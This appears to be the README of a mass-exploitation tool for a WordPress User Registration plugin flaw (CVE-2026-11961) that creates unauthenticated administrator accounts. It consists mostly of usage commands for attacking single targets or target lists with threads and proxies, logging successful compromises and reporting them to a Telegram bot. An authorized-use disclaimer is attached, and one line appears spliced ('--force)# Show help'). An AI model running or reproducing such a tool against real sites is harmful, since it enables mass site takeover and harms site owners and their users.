
CVE-2026-11961 — UserRegistration: WordPress User Registration <= 5.2.2 Privilege Escalation. Misconfigured Membership Roles → Unauthenticated Admin Creation → Site Compromise. CVSS 8.1
Mass Exploit tool for CVE-2026-11961 affecting the WordPress User Registration & Membership plugin.
--force)# Show help
python3 mass.py -h
# Single target
python3 mass.py -u https://target.com
# Single target with custom credentials
python3 mass.py \
-u https://target.com \
--username admin \
--password "StrongPassword123!"
# Multiple targets
python3 mass.py -l targets.txt -t 20
# Save successful results
python3 mass.py -l targets.txt -o results.jsonl
# Write log file
python3 mass.py -l targets.txt --log exploit.log
# Telegram notifications
python3 mass.py \
-l targets.txt \
--tg-token YOUR_BOT_TOKEN \
--tg-chat YOUR_CHAT_ID
# Proxy
python3 mass.py \
-u https://target.com \
--proxy http://127.0.0.1:8080
# Force mode
python3 mass.py -u https://target.com --force
This project is provided solely for authorized security assessments, defensive security research, and vulnerability validation.
By using this software, you confirm that you have explicit authorization to assess the target systems. Unauthorized access to computer systems is prohibited and may violate applicable laws.
The author and contributors do not encourage or condone unauthorized use of this project and assume no responsibility or liability for any misuse, damage, or legal consequences resulting from its use.
JohenLastGen JLG NETWORK
| Option | Description |
|---|
-h, --help | Show help message and exit |
-u, --url | Single target URL |
-l, --list | File containing target URLs (one per line) |
--username | Administrator username (default: randomly generated) |
--password | Administrator password (default: randomly generated) |
-t, --threads | Number of concurrent threads (default: 5) |
--timeout | Request timeout in seconds (default: 15) |
-o, --output | Save successful results to a JSONL file |
--log | Save console logs to a file |
--proxy | HTTP/HTTPS proxy (e.g. http://127.0.0.1:8080) |
--force | Skip version validation and continue processing |
--tg-token | Telegram Bot Token |
--tg-chat | Telegram Chat ID |